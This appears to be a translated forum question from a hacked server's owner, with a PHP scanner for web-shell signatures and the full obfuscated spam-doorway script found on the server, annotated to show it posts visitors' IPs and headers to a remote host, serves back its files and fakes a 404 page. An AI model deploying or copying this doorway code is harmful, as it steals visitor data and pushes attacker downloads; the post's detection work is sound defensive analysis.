我的 Linux 服务器最近被黑了,服务器上运行着一个发送垃圾邮件的脚本,我想找到它的生成器并以这种方式删除它。我写了一段 PHP 代码,用 preg_match 函数在所有目录中搜索确切的模式并提醒我。但我找不出传给 preg_match 的正确正则表达式,例如要匹配下面这个模式:
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x67i\x65q\x68\x6ai\x79e\x6a\x72g"]="\x75\x72\x69";
我的代码:
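/**
 * Recursive scanner that walks the directory this file lives in and flags
 * PHP files containing a known web-shell / spam-doorway signature.
 *
 * Usage: `new ScanFiles();` scans, then prints (and, when the constant
 * SEND_EMAIL_ALERTS_TO is defined, mails) the list of suspicious files.
 * The hits are also left in the public $infected_files property.
 */
class ScanFiles {
    /**
     * Signatures tried against every file, as PCRE patterns.
     *
     * They are single-quoted on purpose, and that is also where the original
     * pattern went wrong: in a single-quoted PHP string `\x47` stays the four
     * characters `\x47`, but PCRE understands `\xHH` as well and turns it back
     * into `G`. A pattern spelled `\x47\x4c...` therefore matches the *decoded*
     * text "GLOBALS", never the escape sequences sitting in the file (and the
     * unescaped `[...]` after it became a character class). A literal backslash
     * needs `\\` in the regex, i.e. `\\\\` in the PHP source, or preg_quote().
     */
    const PATTERNS = [
        // eval() fed by base64, another eval, a variable or a superglobal.
        '/eval\((base64|eval|\$_|\$\$|\$[A-Za-z_0-9\{]*(\(|\{|\[))/i',
        // ${"GLOBALS"} written as 7 tokens, each either an \xHH escape or a plain
        // letter of GLOBALS, with at least one escape present, e.g.
        // ${"\x47\x4c\x4fB\x41\x4c\x53"} or ${"G\x4c\x4fBA\x4c\x53"}. Each copy of
        // the doorway re-randomises which letters are escaped, so the exact string
        // from one sample would miss the next copy; plain ${"GLOBALS"} is not flagged.
        '/\$\{"(?=[^"]*\\\\x)(?:\\\\x[0-9a-f]{2}|[globals]){7}"\}/i',
    ];

    /** Files in which a signature matched, in scan order. */
    public $infected_files = array();
    /** Files that could not be read; they were NOT checked, so they are reported too. */
    public $unreadable_files = array();
    /** Every path visited so far, so a file is never checked twice. */
    private $scanned_files = array();

    /** Scans the directory containing this script, then reports. */
    function __construct() {
        $this->scan(dirname(__FILE__));
        $this->sendalert();
    }

    /**
     * Walks $dir recursively and runs check() on every regular file.
     *
     * @param string $dir directory to walk (no trailing slash)
     * @throws Exception when $dir cannot be listed
     */
    function scan($dir) {
        $this->scanned_files[] = $dir;
        $files = scandir($dir);
        if (!is_array($files)) {
            throw new Exception('Unable to scan directory ' . $dir . '. Please make sure proper permissions have been set.');
        }
        foreach ($files as $file) {
            // Skip only the self/parent entries. Dot-directories (.git, .cache,
            // .well-known, ...) are a favourite hiding place for dropped scripts,
            // so they are walked too; the original `substr($file,0,1) != '.'`
            // test silently skipped all of them.
            if ($file === '.' || $file === '..') {
                continue;
            }
            $path = $dir . '/' . $file;
            if (is_dir($path)) {
                // A symlinked directory can point back up the tree and recurse forever.
                if (!is_link($path)) {
                    $this->scan($path);
                }
            } elseif (is_file($path) && !in_array($path, $this->scanned_files, true)) {
                $contents = file_get_contents($path);
                if ($contents === false) {
                    // Unreadable for this user: record it rather than silently treating it as clean.
                    $this->unreadable_files[] = $path;
                } else {
                    $this->check($contents, $path);
                }
            }
        }
    }

    /**
     * Records $file in $infected_files when any PATTERNS entry matches $contents.
     *
     * @param string|false $contents file body (false or '' is treated as clean)
     * @param string       $file     path reported on a hit
     */
    function check($contents, $file) {
        $this->scanned_files[] = $file;
        $contents = (string) $contents;
        foreach (self::PATTERNS as $pattern) {
            // preg_match() returns false (not 0) on a PCRE error such as the
            // backtrack limit on a huge file, so compare with 1 explicitly.
            if (preg_match($pattern, $contents) === 1) {
                $this->infected_files[] = $file;
                return;
            }
        }
    }

    /**
     * Prints the result and, when SEND_EMAIL_ALERTS_TO is defined, mails it.
     *
     * Without the constant the original call tried to mail the literal address
     * "SEND_EMAIL_ALERTS_TO" (a warning on PHP 7, an Error on PHP 8).
     */
    function sendalert() {
        $unreadable = '';
        if (count($this->unreadable_files) != 0) {
            $unreadable = "\nThe following files could not be read and were NOT checked: \n";
            foreach ($this->unreadable_files as $unr) {
                $unreadable .= " - $unr \n";
            }
        }
        if (count($this->infected_files) == 0) {
            echo "No Malicious Found." . $unreadable;
            return;
        }
        $message = "== MALICIOUS CODE FOUND == \n\n";
        $message .= "The following files appear to be infected: \n";
        foreach ($this->infected_files as $inf) {
            $message .= " - $inf \n";
        }
        $message .= $unreadable;
        if (defined('SEND_EMAIL_ALERTS_TO')) {
            // No extra headers: the original passed 'FROM:' with an empty value,
            // which many MTAs reject outright.
            mail(SEND_EMAIL_ALERTS_TO, 'Malicious Code Found!', $message);
        }
        echo "Malicious Code Found! : " . $message;
    }
}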
下面是我手动找到的垃圾邮件脚本,但它会在服务器上以新的文件名不断自我复制:
<?php
// NOTE(review): obfuscated sample, kept byte-for-byte so it can be matched against
// other copies. The obfuscation is purely lexical: every string is the plain text
// with some characters written as \xHH escapes (${"\x47\x4c\x4fB\x41\x4c\x53"} is
// ${"GLOBALS"}), and ${$x} / ${$GLOBALS["random"]} reads a variable whose real name
// ("ip", "port", "path", "query", "key", "content", "url", ...) was parked under a
// random key in the lines above its first use.
// Decoded, this is a spam "doorway": it collects the visitor's IP and request headers,
// POSTs them to a remote host, and serves back whatever that host returns, either
// inline or as a file download, falling back to a look-alike 404 page (error_404()).
// Indicators literally present in this copy: the address 89.48.11.33, port 80, the
// path /rjbvcxwre/4356vcxgrt.php and the constant 1489383561 from which the callback
// host is derived. The random variable names differ per copy, so detection should
// key on the ${"...GLOBALS-as-escapes..."} shape rather than on any name here.
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x67i\x65q\x68\x6ai\x79e\x6a\x72g"]="\x75\x72\x69";
${"\x47\x4c\x4f\x42\x41\x4cS"}["p\x69\x77\x64\x79\x73vi\x6bh"]="\x64u\x6d\x6d\x79_\x70\x61g\x65";
${"\x47\x4cO\x42\x41\x4c\x53"}["\x72\x68\x74a\x78\x76c"]="\x69\x70\x5fke\x79\x73";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x70\x76g\x74\x67\x62w\x71"]="fi\x6c\x65\x6eam\x65";
${"\x47LO\x42\x41\x4cS"}["\x6ag\x67\x70\x6c\x6d\x66\x6aq\x75\x70"]="\x63o\x6ete\x6e\x74";
${"\x47\x4c\x4f\x42\x41LS"}["\x79\x6cf\x71\x6f\x66x"]="\x69\x70";
${"\x47\x4c\x4fB\x41L\x53"}["\x61\x73\x69\x6f\x6e\x65\x65\x68\x62"]="\x63o\x6e\x74\x65\x6et";
${"\x47\x4c\x4fBA\x4c\x53"}["o\x67\x6anw\x64\x6a\x71\x63\x6a"]="u\x72\x6c";
${"\x47LOB\x41L\x53"}["\x66e\x71\x6bg\x6b\x72edp\x6er"]="\x69";
$tvjuit="ke\x79";
$khpkwwmtyl="\x6b\x65\x79";
${"G\x4c\x4fBA\x4c\x53"}["\x77\x76\x78t\x79hl"]="\x6b\x65y";
${"\x47LO\x42A\x4c\x53"}["l\x76\x67\x66o\x63\x74\x78"]="\x63on\x74e\x78\x74";
$nbutdw="url";
${"GLO\x42\x41L\x53"}["\x61tt\x64\x6f\x6db\x6e\x73\x70\x67"]="quer\x79";
${"\x47L\x4f\x42ALS"}["\x79\x64h\x62\x62\x65\x74\x79h"]="\x6b\x65y";
${"\x47\x4cOB\x41\x4c\x53"}["i\x6c\x62\x68\x75b\x73\x68\x64\x75f\x76"]="\x70\x61t\x68";
$pvpylyxbyi="c\x6fn\x74e\x6e\x74";
// Silence all warnings ("display_errors" below) so a failed callback never shows in logs or output.
error_reporting(0);
$vyjgrxcpune="\x70\x6frt";
ini_set("di\x73\x70la\x79\x5fer\x72\x6f\x72s",0);
$cojuafthyws="\x6b\x65\x79";
${"GLO\x42\x41\x4c\x53"}["\x75w\x71\x76\x7a\x6a\x68\x65\x62\x73m"]="f\x69\x6ce\x6e\x61\x6d\x65";
$aqtvbwqxw="\x69p";
${"\x47\x4c\x4fBAL\x53"}["c\x61e\x70\x77\x71\x6f"]="\x63\x6f\x6e\x74\x65n\x74";
$qkrjqitq="ke\x79";
$whumtbg="\x71\x75\x65ry";
// decoded: $ip = "89.48.11.33"
${$aqtvbwqxw}="89\x2e4\x38.11.\x33\x33";
${"\x47\x4c\x4f\x42\x41L\x53"}["z\x73\x75\x75\x65\x68\x65n"]="\x70a\x74\x68";
${"\x47LO\x42\x41\x4cS"}["\x76\x68t\x6c\x67\x67e\x71\x63\x62g"]="l\x65\x74\x74\x65\x72";
// decoded: $port = "80"
${$vyjgrxcpune}="80";
${"G\x4c\x4fBAL\x53"}["fs\x6c\x64\x7an"]="\x71uer\x79";
$ydnfejql="i";
${"G\x4c\x4f\x42\x41\x4c\x53"}["m\x64\x78\x79\x77\x6e\x77"]="\x71\x75\x65ry";
// decoded: $path = "/rjbvcxwre/4356vcxgrt.php"
${${"\x47\x4c\x4fBALS"}["\x69\x6cb\x68\x75\x62\x73h\x64u\x66\x76"]}="/r\x6a\x62\x76\x63\x78\x77\x72\x65/\x34\x356vcx\x67r\x74\x2ephp";
// $query = what gets sent upstream: i = visitor IP (get_ip() below), p = HTTP_HOST + REQUEST_URI,
// u = User-Agent, a = Accept-Language, r = Referer.
${${"\x47\x4cO\x42\x41\x4c\x53"}["\x61\x74\x74\x64o\x6d\x62\x6e\x73\x70\x67"]}=Array();
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x61\x74td\x6f\x6d\x62nsp\x67"]}["i"]=get_ip();
${${"\x47\x4cO\x42\x41\x4cS"}["\x66\x73\x6c\x64\x7a\x6e"]}["\x70"]=@$_SERVER["\x48\x54T\x50\x5f\x48O\x53\x54"].@$_SERVER["\x52\x45Q\x55E\x53\x54\x5fUR\x49"];
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x78\x66\x65\x6e\x7a\x6c\x6e"]="\x71ue\x72\x79";
$xuoyiyhluct="\x70\x6f\x72\x74";
$gcdkmyrmtf="c\x6fn\x74e\x6e\x74";
${${"\x47\x4cO\x42\x41\x4cS"}["m\x64\x78\x79\x77n\x77"]}["u"]=@$_SERVER["HTTP\x5f\x55SER_\x41G\x45N\x54"];
${${"\x47\x4cO\x42\x41L\x53"}["a\x74\x74\x64o\x6d\x62n\x73p\x67"]}["\x61"]=@$_SERVER["\x48\x54\x54P_AC\x43E\x50\x54_\x4cA\x4eGUAGE"];
${${"GL\x4f\x42\x41\x4cS"}["m\x78\x66\x65\x6ezl\x6e"]}["r"]=@$_SERVER["H\x54T\x50\x5fREFER\x45R"];
// $context = an HTTP POST of $query as a form-encoded body, used by file_get_contents() below.
${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6c\x76g\x66\x6f\x63\x74x"]}=stream_context_create(Array("\x68ttp"=>Array("m\x65\x74\x68\x6f\x64"=>"\x50OS\x54","he\x61\x64\x65\x72"=>"Con\x74en\x74-t\x79\x70e: app\x6c\x69\x63\x61\x74i\x6fn/\x78-\x77\x77w-\x66o\x72m-u\x72\x6c\x65\x6e\x63\x6f\x64\x65d","co\x6et\x65n\x74"=>http_build_query(${$whumtbg}))));
// $key starts at 30535 and sums the bytes of REQUEST_URI; note that the `^=` with itself on the
// line after the loop zeroes it, so the key appears to always end up as 32 and then, via
// str_repeat(chr(...), 8), as eight spaces -- the per-URI part looks like dead computation (verify).
${${"\x47L\x4f\x42\x41\x4cS"}["\x77v\x78t\x79h\x6c"]}=30535;${$ydnfejql}=0;
foreach(str_split($_SERVER["RE\x51\x55E\x53\x54\x5fURI"])as${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x76\x68t\x6cg\x67\x65\x71\x63\x62\x67"]}){${"\x47\x4c\x4fB\x41\x4c\x53"}["\x75o\x73\x74nl\x6f\x75"]="\x6cet\x74\x65\x72";
${${"\x47LOBA\x4cS"}["wv\x78\x74\x79\x68\x6c"]}+=ord(${${"\x47\x4cO\x42\x41\x4c\x53"}["u\x6fs\x74n\x6co\x75"]});
${${"GLO\x42A\x4cS"}["f\x65\x71kgkr\x65\x64\x70\x6er"]}++;}${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x77v\x78\x74\x79h\x6c"]}<<=2;
${${"GL\x4fB\x41\x4c\x53"}["\x77\x76\x78\x74\x79\x68l"]}^=${$khpkwwmtyl};${$qkrjqitq}+=32;
${$cojuafthyws}=str_repeat(chr(${${"G\x4c\x4fBA\x4cS"}["y\x64\x68bb\x65\x74\x79h"]}),8);
// $url = "http://" . long2ip(1489383561 ^ (ord($key[0]) + ord($key[1]) +
//        (REQUEST_URI ends in ".php" ? ip2long($ip) : 6))) . ":" . $port . $path
// i.e. the callback host is the constant XOR-ed with a small request-dependent value.
${${"\x47\x4c\x4fBA\x4c\x53"}["\x6fg\x6a\x6ew\x64\x6a\x71\x63\x6a"]}="htt\x70://".long2ip(1489383561^(ord(${$tvjuit}[0])+ord(${${"G\x4c\x4f\x42\x41\x4cS"}["w\x76xtyh\x6c"]}[1])+(strstr(substr($_SERVER["R\x45\x51U\x45S\x54_\x55\x52\x49"],-4),".p\x68p")==FALSE?6:ip2long(${${"\x47\x4c\x4f\x42AL\x53"}["y\x6c\x66\x71\x6ff\x78"]})))).":".${$xuoyiyhluct}.${${"\x47LOB\x41\x4cS"}["\x7a\x73\x75ueh\x65n"]};
// $content = POST response from the callback host; anything under 10 bytes triggers the fake 404 (which exits).
${${"\x47\x4cOBAL\x53"}["\x61s\x69o\x6ee\x65\x68\x62"]}=@file_get_contents(${$nbutdw},FALSE,${${"\x47L\x4fB\x41\x4cS"}["\x6cv\x67f\x6f\x63\x74\x78"]});
${"G\x4c\x4f\x42ALS"}["r\x64\x6bx\x67\x6b\x6a\x77"]="\x63\x6f\x6e\x74en\x74";if(strlen(${${"G\x4cO\x42\x41L\x53"}["jg\x67\x70l\x6d\x66j\x71\x75p"]})<10){error_404();
// The first line of the response is treated as a filename, the remainder as the body.
}${${"\x47L\x4f\x42A\x4cS"}["rd\x6bxg\x6b\x6a\x77"]}=explode("\n",${$pvpylyxbyi});
${${"\x47L\x4f\x42A\x4c\x53"}["\x68\x70\x76gt\x67\x62w\x71"]}=array_shift(${${"\x47\x4c\x4fB\x41\x4c\x53"}["j\x67gpl\x6d\x66\x6a\x71\x75\x70"]});
${${"G\x4cOBALS"}["\x6a\x67\x67\x70\x6cm\x66\x6a\x71\x75p"]}=implode("\n",${${"\x47\x4c\x4f\x42A\x4c\x53"}["c\x61ep\x77\x71o"]});
// Unless the filename contains ".html", the body is pushed as an attachment download
// (Content-Type: application/octet-stream, Content-Disposition: attachment; filename=...,
// Content-Length); otherwise it is echoed as the page. Either way the script exits here.
if(strstr(${${"\x47L\x4f\x42\x41\x4cS"}["u\x77q\x76z\x6a\x68\x65\x62\x73\x6d"]},"\x2eh\x74m\x6c")===FALSE){header("Co\x6et\x65\x6et-\x54\x79pe:\x20\x61p\x70\x6c\x69ca\x74i\x6fn/\x6f\x63\x74\x65\x74-st\x72\x65\x61\x6d");
header("\x43o\x6et\x65nt-\x44i\x73\x70\x6f\x73\x69tio\x6e: a\x74\x74\x61\x63h\x6dent\x3b fi\x6ce\x6ea\x6d\x65=".${${"\x47\x4c\x4f\x42A\x4c\x53"}["h\x70vg\x74\x67\x62wq"]});
header("\x43\x6fntent-\x4ce\x6eg\x74h: ".strlen(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6a\x67\x67\x70\x6cm\x66\x6a\x71\x75p"]}));
}echo${$gcdkmyrmtf};
exit();
// get_ip(): decoded, $ip_keys is the list HTTP_CF_CONNECTING_IP, HTTP_CLIENT_IP,
// HTTP_X_FORWARDED_FOR, HTTP_X_FORWARDED, HTTP_X_CLUSTER_CLIENT_IP, HTTP_FORWARDED_FOR,
// HTTP_FORWARDED, REMOTE_ADDR. The first header present wins and its first
// comma-separated entry is returned trimmed; with none present it returns
// 255.255.255.255. All but REMOTE_ADDR are client-supplied, so the value is whatever
// the visitor claims; it only feeds the "i" field of the upstream POST.
function get_ip(){${${"\x47\x4cO\x42\x41L\x53"}["r\x68t\x61\x78\x76\x63"]}=array("\x48T\x54P\x5f\x43\x46_\x43O\x4eN\x45\x43\x54\x49\x4eG\x5f\x49P","\x48T\x54P\x5fCLIENT_\x49P","\x48\x54TP_\x58\x5f\x46\x4f\x52\x57\x41\x52D\x45D_F\x4fR","\x48TTP_\x58\x5f\x46O\x52\x57A\x52D\x45\x44","\x48TTP_\x58_\x43\x4cU\x53T\x45R_\x43L\x49\x45N\x54\x5f\x49P","\x48TTP_F\x4fRWAR\x44E\x44\x5f\x46\x4fR","\x48TTP\x5fFORWA\x52\x44ED","RE\x4dO\x54E_\x41\x44D\x52");
foreach(${${"G\x4cOB\x41\x4c\x53"}["\x72\x68\x74\x61\x78\x76\x63"]} as${${"G\x4c\x4f\x42\x41L\x53"}["\x77\x76\x78t\x79h\x6c"]}){$xfdiqu="\x6b\x65\x79";
if(array_key_exists(${$xfdiqu},$_SERVER)===TRUE){${"\x47L\x4fB\x41\x4c\x53"}["p\x66bf\x65\x73\x6ch"]="i\x70";
foreach(explode(",",$_SERVER[${${"\x47L\x4f\x42A\x4c\x53"}["wv\x78\x74\x79\x68\x6c"]}])as${${"G\x4c\x4f\x42A\x4c\x53"}["\x70\x66\x62fes\x6c\x68"]}){$kvytrcc="ip";
return trim(${$kvytrcc});
}}}return"\x3255.255\x2e25\x35\x2e2\x35\x35";
// error_404(): sends "HTTP/1.1 404 Not Found", strips the query string from REQUEST_URI
// into $uri, requests a random non-existent path ("/" . uniqid() . uniqid()) on this
// site's own HTTP_HOST to obtain the site's genuine 404 page, replaces that random path
// with $uri in the returned HTML, and exits with it -- so when the callback host does
// not answer, the doorway is indistinguishable from an ordinary missing page.
}function error_404(){${"GL\x4fB\x41\x4cS"}["\x62x\x74fbg\x6f"]="\x75\x72i";
$rxdfcqp="\x64u\x6dmy\x5fp\x61\x67e";
header("\x48\x54\x54\x50/1.\x31\x204\x304\x20No\x74\x20Found");
${${"G\x4cO\x42A\x4cS"}["\x62\x78\x74\x66\x62go"]}=preg_replace("/(\\?)\x2e*\$/","",$_SERVER["RE\x51UE\x53T_\x55\x52\x49"]);
${$rxdfcqp}="/".uniqid().uniqid();
${${"\x47LOB\x41L\x53"}["\x6a\x67\x67\x70\x6c\x6d\x66\x6a\x71\x75\x70"]}=@file_get_contents("\x68tt\x70://".$_SERVER["\x48\x54\x54\x50\x5f\x48\x4fS\x54"].${${"\x47LO\x42\x41\x4c\x53"}["\x70\x69\x77d\x79s\x76\x69\x6b\x68"]});
${"\x47L\x4f\x42A\x4c\x53"}["\x79\x6e\x69\x61\x6d\x6e\x76\x71\x6d\x68c\x6b"]="\x63\x6fn\x74e\x6et";
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x72\x63\x6ew\x72tu\x69\x6e\x6a\x62"]="\x63\x6f\x6e\x74\x65\x6e\x74";
${"\x47L\x4f\x42\x41\x4c\x53"}["\x65cqb\x76\x6a\x6c\x72"]="d\x75m\x6d\x79\x5fpa\x67\x65";
${${"\x47\x4c\x4fB\x41\x4c\x53"}["rc\x6e\x77\x72\x74\x75\x69\x6e\x6a\x62"]}=str_replace(${${"\x47L\x4fB\x41L\x53"}["\x65\x63\x71\x62vj\x6cr"]},${${"\x47LO\x42A\x4c\x53"}["\x67\x69\x65\x71hj\x69\x79e\x6ar\x67"]},${${"GLOBA\x4cS"}["jg\x67p\x6c\x6d\x66\x6a\x71u\x70"]});
exit(${${"G\x4cOB\x41\x4c\x53"}["\x79\x6ei\x61\x6d\x6evq\x6dhc\x6b"]});}
?>
答案 0 :(得分:0)
我使用另一种方法使用grep命令搜索此模式,并且我设法找到了垃圾邮件代码生成器。